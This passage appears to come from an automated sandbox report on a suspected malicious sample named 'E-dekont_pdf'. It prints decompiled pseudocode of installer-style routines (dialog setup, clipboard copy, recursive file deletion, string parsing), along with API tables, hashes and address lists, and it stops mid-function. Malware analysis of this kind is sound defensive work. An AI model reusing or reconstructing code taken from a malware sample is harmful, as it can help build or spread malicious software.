					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x470278 & 0x00000003) != 0) {
					ShowWindow( *0x468230, _t156);
					if(( *0x470278 & 0x00000002) != 0) {
						 *0x468230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x468228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x470278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                                              0x00405811
                                                                                              0x00405817
                                                                                              0x00405821
                                                                                              0x00405824
                                                                                              0x004059ba
                                                                                              0x004059d7
                                                                                              0x004059de
                                                                                              0x004059de
                                                                                              0x004059f1
                                                                                              0x00405a0f
                                                                                              0x00405a11
                                                                                              0x00405a19
                                                                                              0x00405a6f
                                                                                              0x00405a73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a75
                                                                                              0x00405a7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a85
                                                                                              0x00405a8d
                                                                                              0x00405a90
                                                                                              0x00405b92
                                                                                              0x00000000
                                                                                              0x00405b92
                                                                                              0x00405a9f
                                                                                              0x00405aaa
                                                                                              0x00405ab3
                                                                                              0x00405abe
                                                                                              0x00405ac1
                                                                                              0x00405aca
                                                                                              0x00405ad0
                                                                                              0x00405ad3
                                                                                              0x00405ad3
                                                                                              0x00405aeb
                                                                                              0x00405af4
                                                                                              0x00405af7
                                                                                              0x00405afe
                                                                                              0x00405b05
                                                                                              0x00405b0d
                                                                                              0x00405b0d
                                                                                              0x00405b24
                                                                                              0x00405b24
                                                                                              0x00405b2b
                                                                                              0x00405b31
                                                                                              0x00405b3d
                                                                                              0x00405b44
                                                                                              0x00405b4d
                                                                                              0x00405b4f
                                                                                              0x00405b52
                                                                                              0x00405b61
                                                                                              0x00405b64
                                                                                              0x00405b6a
                                                                                              0x00405b6b
                                                                                              0x00405b71
                                                                                              0x00405b72
                                                                                              0x00405b73
                                                                                              0x00405b7b
                                                                                              0x00405b86
                                                                                              0x00405b8c
                                                                                              0x00405b8c
                                                                                              0x00000000
                                                                                              0x00405aeb
                                                                                              0x00405a21
                                                                                              0x00405a51
                                                                                              0x00405a59
                                                                                              0x00405a5b
                                                                                              0x00405a64
                                                                                              0x00405a64
                                                                                              0x00405a6a
                                                                                              0x00000000
                                                                                              0x00405a6a
                                                                                              0x00405a25
                                                                                              0x00405a2f
                                                                                              0x00000000
                                                                                              0x004059f3
                                                                                              0x004059f9
                                                                                              0x00405a34
                                                                                              0x00000000
                                                                                              0x00405a3d
                                                                                              0x00405a02
                                                                                              0x00405a07
                                                                                              0x00405a0a
                                                                                              0x00000000
                                                                                              0x00405a0a
                                                                                              0x004059f1
                                                                                              0x0040582a
                                                                                              0x0040582e
                                                                                              0x00405836
                                                                                              0x0040583a
                                                                                              0x0040583d
                                                                                              0x00405840
                                                                                              0x00405843
                                                                                              0x00405846
                                                                                              0x00405847
                                                                                              0x00405848
                                                                                              0x00405861
                                                                                              0x00405864
                                                                                              0x0040586e
                                                                                              0x0040587d
                                                                                              0x00405885
                                                                                              0x0040588d
                                                                                              0x00405892
                                                                                              0x00405895
                                                                                              0x004058a1
                                                                                              0x004058aa
                                                                                              0x004058b3
                                                                                              0x004058d5
                                                                                              0x004058db
                                                                                              0x004058ec
                                                                                              0x004058f1
                                                                                              0x004058ff
                                                                                              0x0040590d
                                                                                              0x0040590d
                                                                                              0x00405912
                                                                                              0x00405920
                                                                                              0x00405920
                                                                                              0x00405925
                                                                                              0x00405928
                                                                                              0x0040592d
                                                                                              0x00405939
                                                                                              0x00405942
                                                                                              0x0040594f
                                                                                              0x0040595e
                                                                                              0x00405951
                                                                                              0x00405956
                                                                                              0x00405956
                                                                                              0x0040596a
                                                                                              0x0040596a
                                                                                              0x0040597e
                                                                                              0x00405987
                                                                                              0x00405990
                                                                                              0x004059a0
                                                                                              0x004059ac
                                                                                              0x004059ac
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                                              • GetClientRect.USER32(?,?), ref: 004058B3
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,?,00404424), ref: 00404607
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                                                              • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                              • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                              • CreatePopupMenu.USER32 ref: 00405A96
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                                              • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                              • EmptyClipboard.USER32 ref: 00405B31
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                              • CloseClipboard.USER32 ref: 00405B8C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: HgD${
                                                                                              • API String ID: 590372296-1241270049
                                                                                              • Opcode ID: d36ff5133874f4929c8a4f6797b6cb5b087a99457e057e2a434a347dac087685
                                                                                              • Instruction ID: cb0ca38e27b9ce572f3f488e3f0d985218e3c43d95c603e01a751ae3887d216c
                                                                                              • Opcode Fuzzy Hash: d36ff5133874f4929c8a4f6797b6cb5b087a99457e057e2a434a347dac087685
                                                                                              • Instruction Fuzzy Hash: 48B157B0800608FFDF119FA0DD89AAE7B79FB08354F00417AFA45BA1A0CB755E519F69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 505 405d74-405d9a call 40603f 508 405db3-405dba 505->508 509 405d9c-405dae DeleteFileW 505->509 511 405dbc-405dbe 508->511 512 405dcd-405ddd call 406668 508->512 510 405f30-405f34 509->510 513 405dc4-405dc7 511->513 514 405ede-405ee3 511->514 518 405dec-405ded call 405f83 512->518 519 405ddf-405dea lstrcatW 512->519 513->512 513->514 514->510 517 405ee5-405ee8 514->517 520 405ef2-405efa call 40699e 517->520 521 405eea-405ef0 517->521 522 405df2-405df6 518->522 519->522 520->510 529 405efc-405f10 call 405f37 call 405d2c 520->529 521->510 525 405e02-405e08 lstrcatW 522->525 526 405df8-405e00 522->526 528 405e0d-405e29 lstrlenW FindFirstFileW 525->528 526->525 526->528 530 405ed3-405ed7 528->530 531 405e2f-405e37 528->531 545 405f12-405f15 529->545 546 405f28-405f2b call 4056ca 529->546 530->514 533 405ed9 530->533 534 405e57-405e6b call 406668 531->534 535 405e39-405e41 531->535 533->514 547 405e82-405e8d call 405d2c 534->547 548 405e6d-405e75 534->548 538 405e43-405e4b 535->538 539 405eb6-405ec6 FindNextFileW 535->539 538->534 544 405e4d-405e55 538->544 539->531 543 405ecc-405ecd FindClose 539->543 543->530 544->534 544->539 545->521 549 405f17-405f26 call 4056ca call 406428 545->549 546->510 558 405eae-405eb1 call 4056ca 547->558 559 405e8f-405e92 547->559 548->539 550 405e77-405e80 call 405d74 548->550 549->510 550->539 558->539 562 405e94-405ea4 call 4056ca call 406428 559->562 563 405ea6-405eac 559->563 562->539 563->539
                                                                                              C-Code - Quality: 98%
                                                                                              			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x4702e8 =  *0x4702e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x456750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x456750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x456750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x4702e8 =  *0x4702e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x456750 - 0x5c;
					if( *0x456750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x4702e8 =  *0x4702e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                              0x00405d7e
                                                                                              0x00405d83
                                                                                              0x00405d8c
                                                                                              0x00405d8f
                                                                                              0x00405d97
                                                                                              0x00405d9a
                                                                                              0x00405d9d
                                                                                              0x00405da5
                                                                                              0x00405da7
                                                                                              0x00405da8
                                                                                              0x00000000
                                                                                              0x00405da8
                                                                                              0x00405db3
                                                                                              0x00405db6
                                                                                              0x00405db6
                                                                                              0x00405db6
                                                                                              0x00405dba
                                                                                              0x00405dcd
                                                                                              0x00405dd4
                                                                                              0x00405dd9
                                                                                              0x00405ddd
                                                                                              0x00405ded
                                                                                              0x00405ddf
                                                                                              0x00405de5
                                                                                              0x00405de5
                                                                                              0x00405df2
                                                                                              0x00405df6
                                                                                              0x00405e02
                                                                                              0x00405e08
                                                                                              0x00405e0d
                                                                                              0x00405e13
                                                                                              0x00405e1e
                                                                                              0x00405e24
                                                                                              0x00405e26
                                                                                              0x00405e29
                                                                                              0x00405ed3
                                                                                              0x00405ed3
                                                                                              0x00405ed7
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e2f
                                                                                              0x00405e2f
                                                                                              0x00405e2f
                                                                                              0x00405e37
                                                                                              0x00405e57
                                                                                              0x00405e5f
                                                                                              0x00405e64
                                                                                              0x00405e6b
                                                                                              0x00405e86
                                                                                              0x00405e8b
                                                                                              0x00405e8d
                                                                                              0x00405eb1
                                                                                              0x00405e8f
                                                                                              0x00405e8f
                                                                                              0x00405e92
                                                                                              0x00405ea6
                                                                                              0x00405e94
                                                                                              0x00405e97
                                                                                              0x00405e9f
                                                                                              0x00405e9f
                                                                                              0x00405e92
                                                                                              0x00405e6d
                                                                                              0x00405e73
                                                                                              0x00405e75
                                                                                              0x00405e7b
                                                                                              0x00405e7b
                                                                                              0x00405e75
                                                                                              0x00000000
                                                                                              0x00405e6b
                                                                                              0x00405e39
                                                                                              0x00405e41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e43
                                                                                              0x00405e4b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e4d
                                                                                              0x00405e55
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405eb6
                                                                                              0x00405ebe
                                                                                              0x00405ec4
                                                                                              0x00405ec4
                                                                                              0x00405ecd
                                                                                              0x00000000
                                                                                              0x00405ecd
                                                                                              0x00405df8
                                                                                              0x00405e00
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405dbc
                                                                                              0x00405dbc
                                                                                              0x00405dbe
                                                                                              0x00405ede
                                                                                              0x00405ee0
                                                                                              0x00405ee3
                                                                                              0x00405f34
                                                                                              0x00405f34
                                                                                              0x00405f34
                                                                                              0x00405ee5
                                                                                              0x00405ee8
                                                                                              0x00405ef3
                                                                                              0x00405ef8
                                                                                              0x00405efa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405efd
                                                                                              0x00405f09
                                                                                              0x00405f0e
                                                                                              0x00405f10
                                                                                              0x00000000
                                                                                              0x00405f2b
                                                                                              0x00405f12
                                                                                              0x00405f15
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f1a
                                                                                              0x00000000
                                                                                              0x00405f21
                                                                                              0x00405eea
                                                                                              0x00405eea
                                                                                              0x00000000
                                                                                              0x00405eea
                                                                                              0x00405dc4
                                                                                              0x00405dc7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405dc7

                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,?,763F3420,763F2EE0,00000000), ref: 00405D9D
                                                                                              • lstrcatW.KERNEL32(00456750,\*.*), ref: 00405DE5
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00456750,?,?,763F3420,763F2EE0,00000000), ref: 00405E0E
                                                                                              • FindFirstFileW.KERNEL32(00456750,?,?,?,0040A014,?,00456750,?,?,763F3420,763F2EE0,00000000), ref: 00405E1E
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: .$.$PgE$\*.*
                                                                                              • API String ID: 2035342205-642249328
                                                                                              • Opcode ID: 6184336cf740146bbf75f7bde57d60117f22128d45c27d1f4f02e0522e49edbd
                                                                                              • Instruction ID: 98b2dc6bd422d61c56a8e42b80d5dd3d62c6de78452aeca085abdd1ceada4103
                                                                                              • Opcode Fuzzy Hash: 6184336cf740146bbf75f7bde57d60117f22128d45c27d1f4f02e0522e49edbd
                                                                                              • Instruction Fuzzy Hash: 0E41D230801A15AADB21AB61CC4DABF7678EF41719F10417FF885711D1DB7C4A82DEAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F132351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMONCrypto
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 83%
                                                                                              			E6F132351() {
				void _v4;
				void* _v8;
				signed short _v12;
				signed int _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				short* _t243;
				signed short* _t245;
				signed int _t246;
				signed int _t250;
				void* _t256;
				struct HINSTANCE__* _t257;
				signed int _t258;
				signed int _t260;
				void* _t261;
				signed short _t263;
				signed int _t267;
				void* _t268;
				signed int* _t269;
				void* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				signed int _t290;
				void* _t294;
				signed int _t295;
				signed short* _t296;
				void* _t299;
				signed int _t306;
				signed int _t307;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				short* _t320;
				signed int _t321;
				signed short* _t325;
				signed int _t327;
				WCHAR* _t328;
				signed short* _t329;
				signed int _t341;
				void* _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t349;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				signed int _t365;
				signed int _t370;
				void* _t371;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				void* _t381;
				signed short* _t383;
				void* _t384;
				void* _t386;
				signed short* _t387;
				short* _t388;
				WCHAR* _t389;
				WCHAR* _t390;
				struct HINSTANCE__* _t391;
				signed int _t393;
				signed int _t394;
				signed short _t395;
				void _t396;
				void* _t398;
				void* _t403;
				signed int _t405;
				signed int _t407;
				signed int _t409;

				_t394 = 0;
				_v32 = 0;
				_v52 = 0;
				_t386 = 0;
				_v28 = 0;
				_v56 = 0;
				_v24 = 0;
				_v16 = 0;
				_v36 = 0;
				_t243 = E6F1312F8();
				_v40 = _t243;
				_t320 = _t243;
				_v20 = E6F1312F8();
				_t245 = E6F131593();
				_t325 = _t245;
				_v8 = _t245;
				_v60 = _t325;
				_t387 = _t245;
				_v44 = _t325;
				_v4 = 2;
				while(1) {
					_t378 = _t394;
					if(_t394 != 0 && _t386 == 0) {
						break;
					}
					_t395 =  *_t325 & 0x0000ffff;
					_t246 = _t395 & 0x0000ffff;
					_v12 = _t395;
					_t327 = _t246;
					if(_t327 == 0) {
						_t175 =  &_v52;
						 *_t175 = _v52 | 0xffffffff;
						__eflags =  *_t175;
						L132:
						_t396 = _v32;
						L133:
						_t379 = _t378;
						if(_t379 == 0) {
							 *_t320 = 0;
							__eflags = _t386;
							if(_t386 != 0) {
								_t380 = 0;
								__eflags = 0;
							} else {
								_t386 = GlobalAlloc(0x40, 0x1ca4);
								_t380 = 0;
								 *(_t386 + 0x1010) = 0;
								 *((intOrPtr*)(_t386 + 0x1014)) = 0;
							}
							 *(_t386 + 0x1008) = _t380;
							_t184 = _t386 + 8; // 0x8
							_t328 = _t184;
							 *(_t386 + 0x100c) = _t380;
							_t186 = _t386 + 0x808; // 0x808
							_t388 = _t186;
							 *_t328 = 0;
							 *_t388 = 0;
							 *_t386 = _t396;
							 *(_t386 + 4) = _t380;
							_t250 = _t396 - _t380;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t320 - _v40;
								if(_t320 == _v40) {
									goto L157;
								}
								_t393 = _t380;
								GlobalFree(_t386);
								_push(_v40);
								_t386 = E6F13135A();
								__eflags = _t386;
								if(_t386 == 0) {
									goto L157;
								} else {
									goto L150;
								}
								while(1) {
									L150:
									_t280 =  *(_t386 + 0x1ca0);
									__eflags = _t280;
									if(_t280 == 0) {
										break;
									}
									_t393 = _t386;
									_t386 = _t280;
								}
								__eflags = _t393;
								if(_t393 != 0) {
									_t193 = _t393 + 0x1ca0;
									 *_t193 =  *(_t393 + 0x1ca0) & 0x00000000;
									__eflags =  *_t193;
								}
								_t281 =  *(_t386 + 0x1010);
								__eflags = _t281 & 0x00000008;
								if((_t281 & 0x00000008) == 0) {
									_t341 = 2;
									_t282 = _t281 | _t341;
									__eflags = _t282;
									 *(_t386 + 0x1010) = _t282;
								} else {
									_t386 = E6F131309(_t386);
									 *(_t386 + 0x1010) =  *(_t386 + 0x1010) & 0xfffffff5;
								}
								goto L157;
							} else {
								_t284 = _t250 - 1;
								__eflags = _t284;
								if(_t284 == 0) {
									L145:
									lstrcpyW(_t328, _v20);
									L146:
									_push(_v40);
									_push(_t388);
									L147:
									lstrcpyW();
									L157:
									_t329 = _v60;
									L158:
									_t320 = _v40;
									L159:
									_t394 = _v52;
									_t325 =  &(_t329[1]);
									_v60 = _t325;
									_t387 = _t325;
									_v44 = _t325;
									if(_t394 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t287 = _t284 - 1;
								__eflags = _t287;
								if(_t287 == 0) {
									goto L146;
								}
								__eflags = _t287 != 1;
								if(_t287 != 1) {
									goto L157;
								}
								goto L145;
							}
						}
						_t381 = _t379 - 1;
						if(_t381 == 0) {
							_t290 = _v28;
							if(_v24 == _t381) {
								_t290 = _t290 - 1;
							}
							 *((intOrPtr*)(_t386 + 0x1014)) = _t290;
						}
						goto L157;
					}
					_t343 = _t327 - 0x23;
					if(_t343 == 0) {
						__eflags = _t387 - _v8;
						if(_t387 <= _v8) {
							_t344 = _v52;
							L31:
							__eflags = _v36;
							if(_v36 != 0) {
								L15:
								_t345 = _t344;
								__eflags = _t345;
								if(_t345 == 0) {
									_t383 = _v60;
									while(1) {
										__eflags = _t246 - 0x22;
										if(_t246 != 0x22) {
											break;
										}
										_t383 =  &(_t383[1]);
										__eflags = _v36;
										_v60 = _t383;
										_t387 = _t383;
										if(_v36 == 0) {
											__eflags = 1;
											_v36 = 1;
											L123:
											_t329 = _v60;
											 *_t320 =  *_t329;
											_t294 = 2;
											_t320 = _t320 + _t294;
											goto L159;
										}
										_t161 =  &_v36;
										 *_t161 = _v36 & 0x00000000;
										__eflags =  *_t161;
										_t246 =  *_t383 & 0x0000ffff;
									}
									__eflags = _t246 - 0x2a;
									if(_t246 == 0x2a) {
										_t295 = 2;
										_v32 = _t295;
										goto L157;
									}
									_t398 = 0x2d;
									__eflags = _t246 - _t398;
									if(_t246 == _t398) {
										L119:
										_t346 =  *_t383 & 0x0000ffff;
										__eflags = _t346 - _t398;
										if(_t346 != _t398) {
											L124:
											_t296 =  &(_t383[1]);
											_t384 = 0x3a;
											__eflags =  *_t296 - _t384;
											if( *_t296 != _t384) {
												goto L123;
											}
											__eflags = _t346 - _t398;
											if(_t346 == _t398) {
												goto L123;
											}
											__eflags = 1;
											_v32 = 1;
											L127:
											_t329 = _t296;
											_v60 = _t329;
											__eflags = _t320 - _v40;
											if(_t320 <= _v40) {
												 *_v20 = 0;
												goto L158;
											}
											_push(_v40);
											_push(_v20);
											 *_t320 = 0;
											goto L147;
										}
										_t296 =  &(_t387[1]);
										__eflags =  *_t296 - 0x3e;
										if( *_t296 != 0x3e) {
											goto L124;
										}
										_v32 = 3;
										goto L127;
									}
									_t349 = 0x3a;
									__eflags = _t246 - _t349;
									if(_t246 != _t349) {
										goto L123;
									}
									goto L119;
								}
								_t350 = _t345 - 1;
								__eflags = _t350;
								if(_t350 == 0) {
									_t321 = _v28;
									L51:
									_t299 = _t246 + 0xffffffde;
									__eflags = _t299 - 0x55;
									if(_t299 > 0x55) {
										goto L157;
									}
									_t77 = _t299 + 0x6f132c69; // 0x39000010
									switch( *((intOrPtr*)(( *_t77 & 0x000000ff) * 4 +  &M6F132BDD))) {
										case 0:
											__ecx = _v40;
											__ebx = _v60;
											_push(2);
											__edx = __bp & 0x0000ffff;
											_pop(__ebp);
											while(1) {
												__ebx = __ebx + 2;
												__eax =  *__ebx & 0x0000ffff;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L90;
												}
												L89:
												__eflags =  *(__ebx + 2) - __dx;
												if( *(__ebx + 2) != __dx) {
													L94:
													__ebp = _v40;
													__eax = 0;
													__eflags = 0;
													_v60 = __ebx;
													 *__ecx = __ax;
